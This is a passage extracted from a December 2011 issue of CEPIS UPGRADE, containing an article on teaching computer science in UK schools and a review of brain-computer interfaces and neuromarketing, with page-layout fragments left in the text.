Informatik, TU Dresden, 2009.
<http://lat.inf.tu-dresden.de/research/phd/#Sun-PhD-2008>.
Dmitry Tsarkov and Ian Horrocks.
Fact++ description logic reasoner:
System description. In Ulrich
Furbach and Natarajan Shankar,
editors, Proc. of the Int. Joint Conf.
on Automated Reasoning (IJCAR
2006), volume 4130 of Lecture
Notes in Artificial Intelligence,
pages 292-297. Springer-Verlag,
2006.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
Computer Science
The Future of Computer Science in Schools
Brian Runciman
© 2011 The British Computing Society
This paper was first published by ITNOW (Volume 53, num. 6, Winter 2011, pp. 10-11). ITNOW, a UPENET partner, is the
member magazine for the British Computer Society (BCS), a CEPIS member. It is published, in English, by Oxford University Press
on behalf of the BCS, <http://www.bcs.org/>. The Winter 2011 issue of ITNOW can be accessed at <http://itnow.oxfordjournals.org/
content/53/6.toc>. © Informatica, 2011
We all know that digital literacy is vital in the modern world, but are we making sure our next generation of researchers and academics, the innovators that will produce the UK’s valuable digital intellectual property of the future, are being
looked after too?
Keywords: Computer Science,
Digital Literacy, Schools.
With so many organisations depending on computing, computer science itself should be viewed as a fundamental discipline like Maths and
English. Engineering- and sciencebased industries require computers to
simulate, calculate, emulate, model and
more, yet there is a shortage in the UK
of people with the requisite abilities to
run these systems. And the problem
begins in school.
The Next Gen report shows that 40
per cent of teachers conflate ICT with
computing, not appreciating that ICT
is learning to use applications but computing is learning how to make them.
This is a fundamental difference that
can be compared to that between reading and writing.
Children certainly need to learn
about digital literacy and BCS already
addresses some of these issues with
qualifications like Digital Creator,
ECDL, Digital Skills, eType and the
like. But teaching computing as a discipline in schools will allow children
to express creativity.
Disciplines learnt in even older
computing courses apply because these
are based on principles. It’s the skills
area, such as specific programming
languages, that change. Of course,
practical work is still need to pick up
practical techniques, but an understanding of the discipline can take children right through from primary school
to a university computer science
course.
What about the teachers and
the schools?
Unfortunately teaching computing
seems to have gone backwards in
schools. In the 1980s children using
BBC Micros had the opportunity to
learn programming and wanted to create something using digital building
blocks. But at a certain point that disappeared and schools took to teaching
ICT – how to use word processors,
spreadsheets and the like. Whilst these
skills are useful you can’t forge a career in a creative industry with them.
The qualification network has been
set up in such a way that the main motivation for schools is to climb the
league tables, so they go for ICT quali-
“
Author
Brian Runciman MBCS has been at
BCS (British Computer Society, United
Kingdom) since 2001, starting out as a
writer, moving onto being Managing
Editor and now acting as Publisher for
editorial content. He tweets via
@BrianRunciman. <brian.runciman@
hq.bcs.org.uk>
fications that are based around using
software. The teachers available have
often done a great job teaching ICT,
but there aren’t enough of them. So
those two things together have actually lowered standards and don’t create the environment where head teachers want to teach computer science-related syllabuses.
This means fighting the ethos of
many head teachers that they go for a
qualification because they can get a
very high pass rate in it rather than
getting children involved in a more
demanding qualification that would
lead to our next generation of innovators.
This also affects the motivation of
Computer cience itself should be viewed as
a fundamental discipline like Maths and English
© CEPIS
Farewell Edition
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 121
UPENET
“
Teaching computing as a discipline in schools
will allow children to express creativity
the teachers who could teach computer science-related areas, because ICT
teaching has been seen as something
that can be done by anyone who has
those basic IT skills.
Strange approaches
Strangely, the new English Baccalaureate doesn’t have computer science, or even ICT, included in it. Even
art isn’t included, so this could have
knock-on effects in, for example,
games development, which is a coming together of art of technology.
A way of thinking of this is seeing
the teaching of computing as three-layered: firstly the basic digital literacy,
which most people come out of the
womb with now; then the next level of
the intelligent user, perhaps in architecture or the like; then there is the top
layer: those who are specialists in computing and are creating new technologies and applications. These ones keep
us at the forefront of the creative
economy.
An interesting example of skewed
viewpoints was demonstrated recently
when Michael Gove spoke of Mark
Zuckerberg, surely an excellent computer science role model as founder of
Facebook, as having studied Latin in
school. Gove didn’t mention that he
had also studied computer science,
surely much more relevant. This shows
the traditional emphasis on the classics,
but computer science should also be
part of the curriculum.
"For me computer science is the
new Latin", said Ian Livingstone at this
point in the discussion.
Another example of the difficulties
faced in changing approaches is shown
in games development as promoted by
universities. There are 144 games
courses at universities, but only 10 of
“
122
”
those have been approved as fit for purpose by Skillset. Most are really updated versions of media studies, showing context and impact, but not teaching how to create games.
The codes used by universities to
grade courses are also viewed as not
really doing the job. The universities
could help more by labeling courses
more accurately.
How do we get young people excited about computer science in
schools?
A drawback to the current curriculums means that a child could be taught
the use of Excel spreadsheets three
times over their time at school, when
most could probably master it in a
week. It’s no wonder many of them
find ICT so boring.
Parents, guardians and teachers
need to be aware of the opportunities
computer science can offer. What IT
can do in the creative areas is exciting
for children. For children in secondary education seeing the application of
computer science in, for example, robotics, such as Lego Mindstorms, can
show them that through a computer
you can build and animate an entire
world.
If they see the creative potential
while they are young they will stay
engaged later.
There are also exciting possibilities
in the games industry – despite the bad
press, 97 per cent of what is produced
is family friendly – and very innovative. It’s true in the financial industry
too, which uses advanced modeling
techniques. Many physics PHDs wind
up in the city of London doing computer science activities. Computer
modeling in engineering is vibrant;
pharmaceutical companies are dependent on modeling too. There are huge
opportunities for those with programming talent.
We could also make better use of
role models. If you stopped the average child in the street they would be
hard pushed to name an IT role model.
Possibly they would think of Sir Tim
Berners-Lee, but we need to champion
these more too.
What progress is being made
and what can be done?
"This is where BCS and the Computing at Schools group have a very
important role, because they can bring
together the academic community,
grow it and help others get involved,"
commented Andrew Herbert.
This needs to include a partnership
between the universities and schools.
Until recently the government was
happy that there were plenty of ICT
qualifications and a curriculum in
place, but with the national curriculum
review, it seems that the DFE now recognise not only the importance of digital literacy, but the core academic discipline of computing.
The UK needs to take this seriously
when in China there are a million
graduates with computer science, engineering and software engineering
degrees. Some of the best intellectual
property in technology is coming out
of Israel, where computer science is
taught in schools nationally.
Industry can help too, perhaps encouraging the young to program on
new mobile platforms through competitions and the like. This is being done,
but more is always helpful.
What next?
The panel agreed that computer
science should be an option in the science part of STEM and that education
The new English Baccalaureate doesn’t have
computer science, or even ICT, included in it
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
”
© CEPIS
UPENET
“
Parents, guardians and teachers need to be aware
of the opportunities computer science can offer
”
needs to be reformed in schools and
universities. Computer science needs
to be seen as an essential discipline and
on the school curriculum from early
stages.
Bill Mitchell concluded: "Every
child should be experiencing computing throughout their school life, starting at primary school, through to age
16, even 18."
Note: This article is based on a
video round table discussion produced
by BCS, The Chartered Institute for IT,
on behalf of the BCS Academy of
Computing. It was attended by BCS
Academy of Computing Director Bill
Mitchell; Andrew Herbert, former
Chairman of Microsoft Research Europe and a key player in setting up the
Computing at Schools Working Group;
and Ian Livingstone of EIDOS, coauthor of the recent NESTA report, ‘Next
gen’. Brian Runciman MBCS chaired.
The full video is at <http://www.
bcs.org/video>.
The NESTA report is at <http://
www.nesta.org.uk/publications/assets/
features/next_gen>.
© CEPIS
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 123
UPENET
IT for Health
Neuroscience and ICT: Current and Future Scenarios
Gianluca Zaffiro and Fabio Babiloni
© Mondo Digitale, 2011
This paper was first published, in its original Italian version, under the title "Neuroscienze e ICT: Una Panoramica", by Mondo
Digitale (issue no. 2-3, June-September 2011, pp. 5-14, available at <http://www.mondodigitale.net/>). Mondo Digitale, a founding
member of UPENET, is the digital journal of the CEPIS Italian society AICA (Associazione Italiana per l’Informatica ed il Calcolo
Automatico, <http://www.aicanet.it/>.)
In the last couple of decades the study of human brain has made great advancements thanks to the powerful neuroimaging
devices such as the high resolution electroencephalography (hrEEG) or the functional magnetic resonance imaging (fMRI).
Such advancements have increased our understanding of basic cerebral mechanisms related to memory and sensory
processes. Recently, neuroscience results have attracted the attention of several researchers from the Information and
Communication Technologies (ICT) domain in order to generate new devices and services for disabled as well as normal
people. This paper reviews briefly the applications of Neuroscience in the ICT domain, based on the research actually
funded by the European Union in this field.
1 New Brain Imaging Tools allow the Study of the Cerebral Activity in vivo in Human Beings
In the history of science the development of new analysis tools has often allowed the exploration of new scientific horizons and the overcoming of
old boundaries of knowledge. In the
last 20 years the scientific research has
generated a set of powerful tools to
measure and analyze the cerebral activity in human beings in a completely
"non-invasive" way. It means that they
could be employed to gather data in
awake subjects causing no harm to
their skin. Such tools provide images
of the brain cerebral activity of the subject while s/he is performing a given
task. These could be then presented by
means of colors on real images of the
cerebral structure. In such a way
neuroscientists could observe, like on
a geographic map, the cerebral areas
more active (more colored) during a
particular experimental task. The high
resolution electroencephalography
(hrEEG) is a brain imaging tool that
gathers the cerebral activity of human
beings "in vivo" by measuring the electrical potential on the head surface [1,
2]. The hrEEG returns images of the
124
Authors
Fabio Babiloni holds a PhD in
Computational Engineering from the
Helsinki University of Technology,
Finland. He is currently Professor of
Physiology at the Faculty of Medicine
of the Università di Roma La Sapienza,
Italy. Professor Babiloni is author of
more than 185 papers on bioengineering
and neurophysiological topics on
international peer-reviewed scientific
journals, and more than 250 contributions
to conferences and books chapters. His
total impact factor is more than 350 and
his H-index is 37 (Google Scholar).
Currents interests are in the field of
estimation of cortical connectivity from
EEG data and the area of BCI. Professor
Babiloni is currently grant reviewer for
the National Science Foundation (NSF)
USA, the European Union through the
FP6 and FP7 research programs and
other European agencies. He is an
Associate Editor of four scientific
Journals: "IEEE Trans. On Neural
System and Rehabilitation Engine-
ering", "Frontiers in Neuroprosthesis",
"International Journal of Bioelectromagnetism" and "Computational
Intelligence and Neuroscience".
<[email protected]>
Gianluca Zaffiro graduated in
Electronic Engineering from the
Politecnico di Torino, Italy, and joined
the Italian company Telecom in 1994.
He has participated in international
research projects funded by the EU and
MIUR, occupying various positions of
responsibility. He has participated in
activities in IEC standards in
telecommunications. Currently he holds
a position as senior strategy advisor in
the Telecom Italia Future Centre, where
he is in charge of conducting analysis
of technological innovation, defines
scenarios for the evolution of ICT and
its impact on telecommunications
services. He is the author of numerous
articles in journals and conferences.
<[email protected]>
“
This paper reviews briefly the applications
of Neuroscience in the ICT domain
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© CEPIS
UPENET
“
There are tools that provide images of the brain cerebral activity
of a subject while s/he is performing a given task
”
cerebral activity with a high temporal
resolution (a millisecond or less), and
a moderate spatial resolution (on the
order of fractions of centimeters). Figure 1 presents images of the cerebral
activity some milliseconds after performing a sensorial stimulation on the
right wrist of a healthy subject. The tridimensional head model, on the left
side of the picture, is employed for the
estimation of the cerebral activity. The
cerebral cortex, dura mater (the meningeal membrane that envelopes the
brain), the skull and the head surface
are represented. The spheres show the
position of the electrodes employed for
the recording of the hrEEG. In the same
picture, in the upper row we can observe the sequence of the distribution
of the cerebral activity during an electrical stimulation on the wrist, coded
with a color scale ranging from purple
to red. In the second row we present
the cortical activity, related to the same
temporal instants represented in the
previous line, that is to say the superficial part of the brain (the cortex)
which plays a key role in complex
mental mechanisms such as memory,
concentration, thought, and language.
In the last decades, the use of modern tools of brain imaging has allowed
to clarify the main cerebral structures
involved in cognitive and motor processes of the human being. These techniques have highlighted the key role
of particular cerebral areas, such as the
ones located just on the back of forehead and near the sockets (prefrontal
and orbitofrontal areas), in the planning
and generation of voluntary actions, as
well as in the short and medium term
memorization of concepts and images
[3]. In the last years "signs" of the cerebral activity related to variation of
memorization, attention and emotion,
in tasks always more similar to everyday life conditions, have been measured and recognized.
2 Brain-computer Interfaces’
Working Principle
In the last years researchers have
observed, by means of hrEEG techniques, how, in human beings, the act
of evoking motion activities occurs in
the same cerebral areas related to the
control of the real movement of the
limbs. This important experimental
evidence is at the basis of a technology, known as "brain computer interface" (BCI), which aims at controlling
electronic and mechanical devices only
by means of the modulation of people’s
cerebral activity. Figure 2 presents the
scheme of a typical BCI system: on the
left side a user is represented that with
his/her own mental effort produces a
change of the electrical brain activity
Figure 1: Images of the Cerebral Activity some Milliseconds after a Sensorial Stimulation.
© CEPIS
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 125
UPENET
Figure 2: Logical Scheme of a BCI System.
which can be detected by means of recording devices and analysis of the
EEG signals. If such activity is generated periodically, an automatic system
can recognize the generation of such
mental states by means of proper classification routines. Then, the system
can generate actions in the outside
world and give feedback to the user.
In particular, it can be observed
experimentally that a subject can learn
to autonomously modify the frequency
pattern of his/her own EEG signals,
without the need to recur to some external stimuli. The so called murhythm, which is a particular EEG
wave, can be recorded from the scalp
by means of superficial electrodes located near the top of one’s head and in
posterior direction (central-parietal areas). It is known like such a rhythm is
subjected to a strong diminution of its
amplitude of oscillation (around 8-12
Hz) during limb movements. Such phenomenon is known in literature as desynchronization of the alpha rhythm.
Through training, a subject can learn
how to achieve such a de-synchronization of the EEG rhythm in absence
of a visible movement, simply by evoking the movement of the same limb. In
such a way it is possible to achieve the
user’s voluntary control of a component of the own cerebral activity which
can be detected in a particular EEG frequency band (8-12 Hz), preferentially
on electrodes overtop particular cortical areas (sensory-motor areas). As al-
ready explained, the simple evocation
of motion acts generates patterns of
cerebral activity which are basically
stable and repeatable in time whenever
the subject performs such an evocation
[4, 5]. It is not obvious nor simple for
automatic systems to recognize voluntary modification of the EEG trace with
low error rates such to safely drive mechanical and electronic devices. The
main difficulties addressed in the recognizing of the induced potential modification on the scalp are of manifold
nature. First, a proper learning technique is required to let the subject control a specific pattern of his/her own
EEG. Such a technique requires the use
of appropriate instrumentation that
analyzes in real time the EEG signals
“
These techniques have highlighted
the key role of particular cerebral
areas in the planning and generation
of voluntary actions
”
126
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
Figure 3: The subject generates a cortical activity recognizable by a computer
by varying his/her own mental state. This phenomenon moves the cursor (red
point on the screen) towards one of possible targets (red bar on the edge of
the screen).
and send instantaneous feedback to the
subject, the availability of a proper
methodology such that the subject is
not frustrated by common temporary
failures during the training session and,
at last, proper knowledge for using the
training software in such a way that the
operator can efficiently correct specific
BCI parameters to facilitate the control for each subject. The second difficulty in recognizing the mental activity by EEG analysis comes from the
low signal-to-noise ratio, which is a
typical feature of the EEG itself. In
fact, in still sate this signal is characterized by an oscillatory behavior
which normally makes the variation of
the mu-rhythm amplitude difficult to
detect. In order to properly address this
issue, specific techniques of signal
processing must be adopted to extract
the most relevant EEG features by
employing adequate automatic routines
of classification, known as classifiers.
Like fingerprints are compared in a
police database to recognize people, in
the same way the EEG features are
compared with those obtained by the
subject during the training period. The
extraction of the EEG features is often
done by means of an estimate of the
power spectral density of the signal itself in a frequency range of 8-16 Hz.
Later, the recognition of these features
as belonging to a specific user’s mental state generated during the training
period is performed by classifiers implementing mechanisms relying on artificial neural networks. Once such
classifiers make a decision related to
the user’s motor evocation state, a control action is performed by an elec-
Figure 4: Two subjects playing electronic ping-pong without moving muscles, by means of a braincomputer interface installed at Fondazione Santa Lucia in Rome, Italy. (Panels run from A) to D).)
© CEPIS
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 127
UPENET
Figure 5: The Figure presents several moments related to the control of some electronic devices
in a room by using the modulation of the cerebral activity. (Experiments performed in the
laboratories of Prof. Babiloni at Fondazione Santa Lucia, Rome, Italy.)
tronic or mechanical device in the surrounding environment. This physical
action is therefore an answer to a purely
mental event generated by the user,
acquired by the hrEEG device and later
classified by the BCI software. In Figure 3 it is shown like a user can directly move a cursor in two dimensions
by recognition of mental states. The
command that triggers the movement
to the right corresponds to evoking the
right hand movement, and vice versa
for evoking the left hand. The evocation of right and left foot movements
slides the cursor towards upper or
lower positions. All the experiments
have been performed at IRCCS
Fondazione Santa Lucia in collaboration with the Physiology and Pharmacology Department of Università di
Roma La Sapienza, Italy.
In Figure 4 the image of two subjects playing ping-pong by means of a
BCI is shown. In such a case the modulation of the mental activity translates
into the movement of a cursor on the
screen towards upper and lower positions for both subjects.
128
3 Examples of Use of the BCI
Technology in the ICT Domains of
Robotic and Device Control
In Figure 5 some existing
functionalities available for the control
of simple electronic devices in a room
are presented. In frames A and B it can
be noticed how the subject switches a
light on through the selection of an appropriate icon on the screen just by using mental activity. In the C and D frames
of the same figure it can be observed how
the same user can control the movement
of a simple robot by using the modulation of cerebral activity. The possibility
of controlling the robot, equipped with a
camera on its head, allows the disabled
user to showing his/her presence in other
parts of the home instead of having to
use ubiquitous videocameras in every
room, which harm the privacy of the
caregivers.
In the area of assisted living there
are companies working at the creation
of a prototype of a motorized wheelchair controlled by using the brain
computer interface technology. A possible example of such device is shown
in Figure 7, as recently demonstrated
by Toyota [6]
Figure 6 presents how a robotic
device is controlled by using cerebral
activity that could be used also in contexts beyond tele-presence or
domotics, for example in entertainment
applications.
“
The ‘brain computer interface’ (BCI)
aims at controlling electronic and
mechanical devices only by means
of the modulation
of people’s cerebral activity
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© CEPIS
UPENET
5 Neuroscience and BCIs are
already used in Entertainment
and Cognitive Training Market
Fields
Several examples of commercial
solutions based on BCIs are reported
in this section to demonstrate that these
technologies are present also outside
research labs. In most cases those solutions, such as gaming, healthcare,
“
Figure 6: Robotic device (Aibo from Sony) driven by the modulation of EEG
brainwaves as gathered by the EEG cap visible in some frames at the bottom
right corner (frames have to be read from left to right and from the upper to the
lower part). These pictures show the possibility of sending mental commands
via wireless technology to the Sony Aibo robot.
A subject can
learn to
autonomously modify
the frequency pattern
of his/her own EEG
signals, without the
need to recur
to some
external stimuli
”
4 About the Use of BCI Systems in the Next Future
BCI systems are studied currently
to improve the quality of life of patients
affected by severe motor disabilities,
in order to provide them with some
degree of autonomous movement autonomy or decision. The next step for
such systems it is to make those systems available to non disabled people,
in normal daily life situations. For instance, a videogame could be controlled just by thoughts (see Section 5) or
messages could be sent to other users
that could be constantly connected to
us by modulating our mental activity.
Such activity will be gathered by few
subtle, invisible sensors disposed on
the scalp, and the computational unit
will be not greater than a watch and
easily wearable. Although such kind of
scenario seems taken from a science-fiction book or movie, a description like this
about our future comes from a study from
the European Union about new life styles
in 2030, fruit of several days of debate
between scientists in different disciplines,
including ICT and health [7].
© CEPIS
Figure 7: Motorized Wheelchair driven by BCI Technology, from Toyota.
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011 129
UPENET
Figure 9: XWAVE plays by using Cerebral brainwaves on iPhone.
Figure 8: Game Controller developed
by Emotiv, a California based Company.
coaching or training, are sold in the
range of ten to thousand dollars. Some
companies address controller market
for PC videogames: for example, two
American companies, Emotiv and
OCZ Technologies, are providing BCIs
that interpret both the muscle movements and electrical cortical signals.
Their devices consist of a headband or
helmet equipped with special electrodes, which sell for $100-300. The
Emotiv controller, shown in Figure 8,
comes with a set of classic arcade
games such as the Ping Pong and Tetris
"brain-controlled" versions.
Other companies are offering these
game controllers for smartphones or
tablets, such as Xwave or MindSet.
Mindset is a BCI developed by American NeuroSky which allows you to
play BrainMaze with a Nokia N97,
driving a ball with your mind in a labyrinth [8]. Xwave, a PLX Devices creation (Figure 9), is a device connected
to your iPhone or iPad which allows
you to compete in games or train your
mind [9]. BCIs have also made inroads
in toys: big companies like Mattel and
UncleMilton are producing two similar toys, respectively Mind Flex (Figure 10) and the Star Wars Science Force
Trainer. These toys are available for
about $100. Both of them are based on
130
“
There are companies working at
the creation of a prototype of a
motorized wheelchair controlled by
using the brain computer
interface technology
a brainwave controlled fan used to levitate a foam ball, which in turn has to
be moved around to a given position.
In the United Stated of America (USA)
alone the market of "cognitive training" has increased from 2 million dol-
”
lars in 2005 to 80 million of 2009 [10].
Much attention has been raised by
neurofeedback, a technique aimed at
training to control your own
brainwaves through their graphical display. This procedure is used both in
Figure 10: Mattel’s Toy based on BCI.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
Figure 11: An experimental setup related to an experiment of synthetic telepathy at the laboratory
of the Fondazione Santa Lucia and the Università di Roma La Sapienza, Italy, led by Prof. Babiloni.
The two subjects are exchanging simple information bits (the cursor is moving up or down) just by
modulating their cerebral activity through a brain computer interface system linking them.
medicine as a treatment for disorders
such as ADD (Attention Deficit Disorder), and in training of professionals, students, and athletes as to improve
their concentration, attention and learning performances.
At CES 2011, the most important
exhibition for consumer electronics
worldwide, a BCI-based prototype system for ADD treatment, BrainPal, has
been unveiled [11]. In Sweden,
Mindball, a therapeutic toy used to
train the brain to relax or concentrate,
is available from ProductLine Interactive. Some top level soccer teams like
AC Milan and Chelsea have been undertaking neurofeedback training.
6 Applied Neuroscience can
support Marketing and Advertising of Products and Services
Business people are looking into
neuroscience in order to understand
and predict the human buying mechanisms. Neuromarketing is a discipline
born from the combination of these two
scientific fields, aiming at knowing
why a buyer chooses a product or service. Much attention is now directed to
the analysis of advertising, notoriously
one of the most effective stimuli for
purchases.
Traditional marketing assesses peo-
© CEPIS
ple’s reactions to advertising stimuli
with indirect techniques (observation,
interviews and questionnaires) whilst
Neuromarketing investigates the direct
physiological response caused by advertising stimuli (electrical response of
the brain) and from this it infers the
cognitive implications (levels of attention, memory and pleasure).
Neuromarketing does not assess
behaviors but tries to find out how advertising stimuli "leave their mark" in
the brain of people. Two approaches
based on cortical EEG measures have
mainly been adopted in the market.
One is the scientific approach, which
starts from the neuroscience evidence
to infer the effectiveness of a given
stimulus by measuring with a high density EEG (>60 electrodes) the cortical
electrical activity in all the areas of the
brain. This approach can be simplified
by limiting the area of the neural signal measurements to the frontal lobes,
on which a minimun of 10 electrodes
should be applied, that are sufficient
to acquire indicators for levels of attention, memory and emotion.
The obvious advantage with this
approach is that the results can be directly related to scientific evidence, but
there are limits to the practicality and
scalability of the test since often measurement devices are required that are
uncomfortable to wear and time-consuming in terms of the subject’s preparation.
The other approach is the heuristic
one, which has its strength in the use
of proprietary EEG equipments that
have a reduced number of electrodes
(it could be just an electrode centrally
positioned on top of the head or two
on the frontal lobes) with which you
measure the parameters of interest in
neuromarketing. The simplified arrangements encourage portability by
reducing discomfort and preparation
“
Farewell Edition
Neuromarketing is a discipline born
from the combination of these
two scientific fields,
Neuroscience and Marketing
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 131
UPENET
Focus on Neuromarketing
In this section we report the application areas that neuromarketing companies are addressing today, associated with
some examples of studies promoted by well-known international companies.
„ Advertising: Neuromarketing is widely used to measure the effectiveness of print ads or videos (commercials) and
their enhancement as a function of communication campaigns. Case Studies: we report an analysis produced by BrainSigns,
spin-off of "La Sapienza" University of Rome. Figure A in this box presents two diagrams obtained for a population of viewers
watching a TV commercial. The spot featured a flirt scene (a girl’s message immediately interrupted) that literally "catalysed"
the attention of the viewers and the memorization at the expense of attention and memorization of the brand advertised and
its message. The viewers liked the spot, but they did not get the intended message from it. As a second example, Coca-Cola
commissioned EmSense [13] to perform a study using neuromarketing techniques to choose, between several possibilities,
the most effective commercial to air on television during the Superbowl, the final game of the USA National Footnall League
. Finally on Google’s behalf, NeuroFocus used neuromarketing techniques [14] to assess the impact on users of the introduction on Youtube of Invideo Ads, which are semitransparent banner ads superimposed on YouTube videos streamed over the
Internet.
„ Multimedia: Neuromarketing can evaluate a movie trailer, an entire movie or a television show with the aim of understanding how the engagement level of the audience changes in time and identify the points of a movie where, for example,
there are high levels of suspense or surprise in the audience. Case Studies: 20-th Century Fox has commissioned Innerscope
[15] to evaluate the movie trailers for the films "28Weeks Later" and "Live Free or Die Hard". NBC has commissioned Innerscope
as well [15] to study the viewers’ perception of advertising during the fast forward of a recorded TV content.
„ Ergonomics: Neuroscience can improve the design process of device interfaces and improve the user experience,
assessing the cognitive workload that is required to learn how to use the device, and the engagement, satisfaction or stress
levels generated by its use. Case study: in 2006 Microsoft [16] decided to apply EEG to experimentally investigate how to
perform a user task classification using a low-cost electroencephalograph.
„ Packaging: Neuromarketing can be used to obtain a more appealing package design, so that, for example, a customer
can recognize the product more easily on a shelf in a supermarket, chosen among others like it.
„ Videogames: Neuromarketing can evaluate the players’ engagement, identify the most interesting features of the
games and optimize their details. During all phases of the game, the difficulty level can be calibrated properly so that a game
is challenging, but not excessively difficult. Case Study: EmSense conducted a study [17] on the "first person shooting" genre
of videogames in which, during the game, they evaluated the levels of positive emotion, engagement and cognitive activation
of the players in function of time.
„ Product Placement: Neuromarketing studies can support the identification of the best positioning of a product on the
shelf of a supermarket and the optimal placement of advertising for a product or a brand in a scene during a TV show.
„ Politics: Neuromarketing techniques can be applied to carry out studies in the political sphere, for example by measuring the reactions of voters to candidates at rallies and speeches. Case Study: during the elections of the UK Prime Minister
in 2010 [18] NeuroFocus conducted and published a study about the measured prospective voters’ neurological reactions,
highlighting the subconscious scores evoked by the candidates on a sample of subjects.
Figure A: Mean changes of attention (left) and memorization (right) of a given audience while watching a commercial. The higher
the signal, the more active processes of attention and memory toward the spot. (Courtesy BrainSigns Ltd.)
132
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
“
Neuromarketing is extremely
suitable for supporting the design
of advertising spots
”
time, with the aim of make the testing
process as equivalent as possible to the
actual experience of the subject. However today it is not possible to compare the obtained results with the scientific literature.
Neuromarketing is extremely suitable for supporting the design of advertising spots, and it allows to increase
the ability to stimulate attention and
memory retention, and placing the advertisement in a manner consistent
with the brand. In the TV spot postcreative phase, it is useful to measure
comparative efficacy and to select and
optimize the existing spots, reducing
their time format. Finally, in the spot
programming phase it allows to
optimize the frequency in a given
broadcasting timeframe, checking in
lab how long subjects have to be exposed for the commercial to be memorized.
Today, most companies operating
in neuromarketing are located in the
USA where they were founded in the
last five years. Many of these employ
devices for neurophysiological measures (EEG and sensors) developed inhouse, while others adopt technological solutions from third parties (see the
box section "Focus on Neuromarketing").
feels. Another interesting area of research in which EU supported scientific studies is the on-line monitoring
of the cerebral workload of drivers of
public vehicles, such as aircrafts, or
trains as well as cars.
Recently a research line related to
the field of the so called "synthetic telepathy" is being developed in the
USA, where the capability of two common persons to exchange information
between them just by using the modulation of their cerebral activity is being tested. This is made possible by
using the concepts developed in the
field of the BCI. In particular, Figure
11 presents an experimental setup of
"synthetic telepathy" developed at the
joint laboratories of the Fondazione
Santa Lucia and the Università di
Roma La Sapienza, Italy. In the picture two subjects are exchanging information about the position of an electronic cursor on the screen that they
are able to move by using a modulation of their cerebral activity.
Although in this moment the speed
transmission is really limited to few
bits per minute, the proof of concept
of such devices has been already demonstrated.
8 Conclusions
7 What is going on in Research
about ICT and Neuroscience
During the years 2007-2011 the
European Union has supported with
more than 30 million of Euros research
projects linked to the use of BCI systems for the control of videogames,
domestic
appliances,
and
mechanotronic prosthesis for hands
and limbs. In addition, EU funding has
been directed also for the evaluation
of the mental state of passengers of
aircrafts during transoceanic flights, in
order to provide them with board services in agreement with their emotional
© CEPIS
In this paper it has the main research streams involving both neuroscience and ICT have been described
“
briefly. There is an increasing interest
from the ICT area for the results offered by neuroscience in terms of a new
generation of ICT devices and tools
"powered" by the ability of being
guided by mental activity. Although the
state of the art is still far from everyday technological implementations like
those shown in the modern science-fiction movies, there are thousands of researchers that are nowadays engaged
in the area of brain computer interfaces
researching about next generation electronic devices, while 10 years ago there
were very few. As the eminent neuroscientist Martha Farah said recently
[12] the question is not "if" but rather
"when" and "how" our future will be
shaped by neuroscience. At that time
it will be better to be ready to ride the
"neuro-ICT revolution".
References
[1] Babiloni F., Babiloni C., Carducci
F., Fattorini L., Onorati P., Urbano
A., Spline Laplacian estimate of
EEG potentials over a realistic magnetic resonance-constructed ,scalp
surface model. Electroenceph.clin.
Neurophysiol, 98(4):363-373,
1996.
[2] Nunez P., Neocortical Dynamics
and Human EEG Rhythms, Oxford University Press, 1995
[3] Damasio A. R., L’ errore di
Cartesio. Emozione, ragione e
cervello umano, Adelphi, 1995.
[4] Wolpaw J. R., Birbaumer N.,
McFarland D. J., Pfurtscheller G.,
Vaughan T. M., Brain computer
interfaces for communication and
control. Clinical Neurophysiology, 113:767-791, 2002.
[5] Babiloni F., Cincotti F., Marciani
M.Salinari S., Astolfi L., Aloise
The capability of two common persons
to exchange information between them
just by using the modulation of
their cerebral activity
is being tested
Farewell Edition
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011 133
UPENET
F., De Vico Fallani F., Mattia D.,
On the use of brain-computer interfaces outside scientific laboratories toward an application in
domotic environments., Int Rev
Neurobiol. 86:133-46, 2009.
[6] Toyota, <http://www.toyota.co.jp/
en/news/09/0629_1.html>.
[7] COST (European Cooperation in
Science and Technology), <http:/
/ w w w. c o s t . e s f . o r g / e v e n t s /
foresight_2030_ccst-ict>.
[8] Engadget, <http://www.engadget.
com/2010/01/18/nokia-n97sbrain-maze-requires-steadyhand-typical-mind-contro>.
[9] Plxwave, <http://www.plxwave.
com>.
[10] e! Science News, <http://escience
news.com/articles/200902/09
study. questions.effectiveness.80.
million. year.brain.exercise.
products.industry>.
[11] I 2R TechFest, <http://techfest.
i2r.a-star.edu.sg/index. php?
option=com_content&
view=article& id=75&Itemid
=56>.
[12] Farah M., Neuroethics: the practical and the philosophical, Trends
in Cogn. Sciences., vol. 9, 2005.
[13] Adweek, <http://www.adweek.
com/aw/content_display/news/
media/e3i975331243e08d74c5
b66f857ff12cfd5>.
[14] Neurofocus,
<http://www.
neurofocus.com/news/
mediagoogle.html>.
[15] Boston.com, <http//www.boston.
com/ae/tv/articles/2007/05/13/
emote_controlA.
[16] Lee J. C., Desney T. S., Using a
Low-Cost Electroencephalograph
for Task Classification in HCI Research, UIST, 2006.
[17] GGl.com, <http://wire.ggl.com/
news/if-you-want-a-good-fpsuse-close-combat>.
[18] PR Newswire, <http://www.
prnewswire.com/news-releases/
neurotips-for-each-candidate-inthe-final-48-hours-of-uk-primeminister-campaign-be-aware-ofvoters-subconscious-scores-forstrengthsweaknesses-be-wary-ofgender-splits-92777229.html>.
134
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© CEPIS
UPENET
IT for Music
Katmus: Specific Application to support
Assisted Music Transcription
Orlando García-Feal, Silvana Gómez-Meire, and David Olivieri
© Novática, 2011
